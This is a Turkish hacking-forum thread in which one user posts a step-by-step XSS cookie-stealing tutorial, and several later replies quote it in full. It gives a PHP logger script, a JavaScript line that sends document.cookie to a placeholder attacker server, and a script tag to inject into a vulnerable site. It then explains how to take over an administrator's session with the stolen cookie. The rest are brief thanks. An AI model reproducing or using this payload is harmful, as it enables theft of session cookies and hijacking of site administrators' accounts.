Basit XSS cookie stealing (1 Viewer)

[Quaxer]

Öncelikle kendi sunucumuza istediğiniz bir isimle php dosyası oluşturun -ben hata.php dedim- sonraiçine şunları yapıştırın:

<?php
if(isset($_GET["qxcek"])){
    $file = fopen('yem.html', 'a');
    fwrite($file, $_GET["qxcek"]."\n");
    fclose($file);
}
?>
 i=new/**/Image();i.src=http://burasizinsunucunuz.tk/hata.php?qxcek="+escape(document.cookie)

Sonra XSS açıklı hedef sitemize geliyoruz ve xss açığı olan sayfayı buluyoruz. Hemen şu kodu oraya eklettiriyoruz.

<script type="text/javascript" src="http://burasizinsunucunuz.tk/hata.php"></script>

Şimdi bekleme sırası 1-2 gün bekleyin. Eğer admin bu xss açıklı sayfa girerse ve o sırada da oturumu açıksa direk cookieler sizin sunucunuzda yem.html dosyasında
Bundan sonra mozilla için cookie manager yükleyin. Hedef sitenizde sizin cookieyi bulup editleyip çektiğimiz adminin cookiesini yazın. Ve artık adminin oturumu sizde başladı

 

[Vanro]

bakalım eline sağlık

 

[Quaxer]

bakalım eline sağlık

Eyw

 

[sEfee]

Öncelikle kendi sunucumuza istediğiniz bir isimle php dosyası oluşturun -ben hata.php dedim- sonraiçine şunları yapıştırın:

<?php
if(isset($_GET["qxcek"])){
    $file = fopen('yem.html', 'a');
    fwrite($file, $_GET["qxcek"]."\n");
    fclose($file);
}
?>
 i=new/**/Image();i.src=http://burasizinsunucunuz.tk/hata.php?qxcek="+escape(document.cookie)

Sonra XSS açıklı hedef sitemize geliyoruz ve xss açığı olan sayfayı buluyoruz. Hemen şu kodu oraya eklettiriyoruz.

<script type="text/javascript" src="http://burasizinsunucunuz.tk/hata.php"></script>

Şimdi bekleme sırası 1-2 gün bekleyin. Eğer admin bu xss açıklı sayfa girerse ve o sırada da oturumu açıksa direk cookieler sizin sunucunuzda yem.html dosyasında
Bundan sonra mozilla için cookie manager yükleyin. Hedef sitenizde sizin cookieyi bulup editleyip çektiğimiz adminin cookiesini yazın. Ve artık adminin oturumu sizde başladı

Teşekkürler

 

[JFoundlow]

hort

 

[Adamındibi]

Öncelikle kendi sunucumuza istediğiniz bir isimle php dosyası oluşturun -ben hata.php dedim- sonraiçine şunları yapıştırın:

<?php
if(isset($_GET["qxcek"])){
    $file = fopen('yem.html', 'a');
    fwrite($file, $_GET["qxcek"]."\n");
    fclose($file);
}
?>
 i=new/**/Image();i.src=http://burasizinsunucunuz.tk/hata.php?qxcek="+escape(document.cookie)

Sonra XSS açıklı hedef sitemize geliyoruz ve xss açığı olan sayfayı buluyoruz. Hemen şu kodu oraya eklettiriyoruz.

<script type="text/javascript" src="http://burasizinsunucunuz.tk/hata.php"></script>

Şimdi bekleme sırası 1-2 gün bekleyin. Eğer admin bu xss açıklı sayfa girerse ve o sırada da oturumu açıksa direk cookieler sizin sunucunuzda yem.html dosyasında
Bundan sonra mozilla için cookie manager yükleyin. Hedef sitenizde sizin cookieyi bulup editleyip çektiğimiz adminin cookiesini yazın. Ve artık adminin oturumu sizde başladı

eline sağlık

 

[Quaxer]

eline sağlık

Eyw

 

[LETRX]

bakalım

 

[siber savaşçı]

bakalım

 

[Mercenary]

Bakalım

 

[Wiosx]

Öncelikle kendi sunucumuza istediğiniz bir isimle php dosyası oluşturun -ben hata.php dedim- sonraiçine şunları yapıştırın:

<?php
if(isset($_GET["qxcek"])){
    $file = fopen('yem.html', 'a');
    fwrite($file, $_GET["qxcek"]."\n");
    fclose($file);
}
?>
 i=new/**/Image();i.src=http://burasizinsunucunuz.tk/hata.php?qxcek="+escape(document.cookie)

Sonra XSS açıklı hedef sitemize geliyoruz ve xss açığı olan sayfayı buluyoruz. Hemen şu kodu oraya eklettiriyoruz.

<script type="text/javascript" src="http://burasizinsunucunuz.tk/hata.php"></script>

Şimdi bekleme sırası 1-2 gün bekleyin. Eğer admin bu xss açıklı sayfa girerse ve o sırada da oturumu açıksa direk cookieler sizin sunucunuzda yem.html dosyasında
Bundan sonra mozilla için cookie manager yükleyin. Hedef sitenizde sizin cookieyi bulup editleyip çektiğimiz adminin cookiesini yazın. Ve artık adminin oturumu sizde başladı

bakalım

 

[K4P4NC1]

Bakalım

 

[ParZ]

+